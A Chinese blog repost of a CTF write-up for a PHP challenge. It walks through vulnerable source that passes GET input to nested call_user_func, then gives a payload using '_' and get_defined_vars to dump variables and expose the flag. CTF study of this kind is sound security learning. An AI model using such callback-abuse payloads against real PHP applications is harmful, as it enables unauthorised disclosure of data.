2. 程式人生 > 其它 >php特性之回撥函式與_函式

php特性之回撥函式與_函式

阿新 發佈:2022-04-03

Web 128

摘自https://blog.csdn.net/qq_49480008/article/details/113753951,僅作個人收藏學習!

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-10 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-12 19:49:05

*/


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}



function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
} NULL

事先需要知道的知識:
call_user_func函式
get_defined_vars函式
GetText函式

解題思路:

var_dump(call_user_func(call_user_func($f1,$f2)));
call_user_func ( callable $callback , mixed $parameter = ? , mixed $... = ? ) : mixed

第一個引數 callback 是被呼叫的回撥函式,其餘引數是回撥函式的引數

get_defined_vars — 返回由所有已定義變數所組成的陣列
printf(gettext("My name is %s.\n"), my_name);
等價於
printf(_("My name is %s.\n"), my_name);

所以可構造playload:

?f1=_&f2=get_defined_vars
var_dump(call_user_func(call_user_func($f1,$f2)));
=> var_dump(call_user_func(call_user_func(_,'get_defined_vars')));
=> var_dump(call_user_func(get_defined_vars));

 

相關推薦

php特性函式_函式

Web 128 摘自https://blog.csdn.net/qq_49480008/article/details/113753951,僅作個人收藏學習!

函式普通函式呼叫分不清楚?3分鐘幫你搞定!

在剛開始學習函式呼叫時,不少初學者弄不清楚“普通函式呼叫”和“函式”之間的區別,下面做一個簡單的對比分析。

泡泡的學習小筆記函式

技術標籤:筆記c++ 回撥函式初接觸 Q1:什麼是回撥函式? A:回撥函式就是一個被作為引數傳遞的函式。 Q2:如何使用回撥函式? A: 第一步:建立一個回撥函式。(普通的函式建立) 第二步:在提供函式實現的一方

c語言函式_C語言基礎——函式

技術標籤:c語言回撥函式回撥函式例子回撥函式的引數傳遞 前言 在嵌入式物聯網裝置的開發中,一個專案軟體由於其相對的複雜性,通常需要多人合作開發才能完成。以WIFI模組的二次開發舉例,WIFI模組除了需要完

PHP基礎】PHP中的函式和匿名函式,再認識一下

技術標籤:phpPHP基礎知識php後端 回撥函式 PHP回撥函式在主執行緒執行的過程中,突然跳去執行設定的回撥函式回撥函式執行完畢之後,再回到主執行緒處理接下來的流程。在php中使用函式對應的字串名稱執行。

【基礎】PHP中使用函式處理陣列的函式有哪些

技術標籤:phpPHP基礎知識php後端 函式回撥PHP中的一種特殊機制,這種機制允許在函式的引數列表中,傳入使用者自定義的函式地址作為引數處理或完成一定的操作。使用回撥函式可以很容易地實現一些所需的功能。

SpringBoot 學習 @PostConstruct、 @Autowired建構函式的執行順序

技術標籤:筆記spring boot 雖然 @PostConstruct、 @Autowired 和 建構函式都是在 Servlet 載入時呼叫,但是呼叫是時間還是有一些區別

OpenCV漫水填充floodFill函式(C++實現)

技術標籤:C++opencv影象處理opencv計算機視覺c++ 漫水填充的定義 漫水填充是一種用特定的顏色填充連通區域,通常設定可連通畫素的上下限以及連通方式來得到不同的填充效果的方法。漫水填充經常被用來標記或分離

php加密函式解密函式

技術標籤:php加密解密 去網上找了下。 Php常用的加密函式有 MD5加密(不可逆)、Crypt加密(不可逆)、Sha1加密(不可逆)、Urlencode加密(可逆) base64編碼加密(可逆)

c++模板學習03普通函式模板函式區別

技術標籤:c++模板學習c++ 普通函式函式模板的區別 1.普通函式呼叫可以發生隱式型別轉換

【Java】Java8新特性介面預設方法靜態方法

一、介面預設方法   預設方法是在介面中的方法簽名前加上了default關鍵字的實現方法

地獄Promise物件(二)

promise // promise物件 // resolve可以將非同步資料傳遞出來 let p = new Promise(function(resolve){

【第3版emWin教程】第42章 emWin6.x視窗管理器訊息型別

教程不斷更新中:http://www.armbbs.cn/forum.php?mod=viewthread&tid=98429 第42章 emWin6.x視窗管理器訊息型別

JavaScripts柯里化函式

參考資料:https://github.com/mqyqingfeng/Blog/issues/42 柯里化(Currying): 定義:柯里化是表示將某個多引數的函式轉換為一系列只有一個引數的函式的技術。

JavaScript函式ES6箭頭函式匿名函式

我的部落格 匿名函式  setTimeout(function() {        console.log(\"This message is shown after 3 seconds\");

oracle常用分析函式聚合函式的用法

今天是2019年第一天,在此祝大家新年快樂,夢想還在路上,讓我們繼續加油!

18.箭頭函式普通函式有什麼區別

目錄 相比普通函式更簡潔的語法 沒有this 不能使用new 不繫結arguments,用rest引數...解決

箭頭函式普通函式的區別

箭頭函式: let fun = () => { console.log(\'lalalala\'); } 普通函式: function fun() { console.log(\'lalla\');

函式宣告表示式、匿名函式具名函式、立即執行函式

定義函式的三種方式: 函式宣告:function 函式名稱(引數){函式體} 表示式:var express = function 函式名稱(引數){函式體}

2-4:解構函式建構函式中使用動態記憶體

在解構函式建構函式中使用動態記憶體 1.解構函式的使用 (1)解構函式在物件對銷燬時自動呼叫,一般有2種情況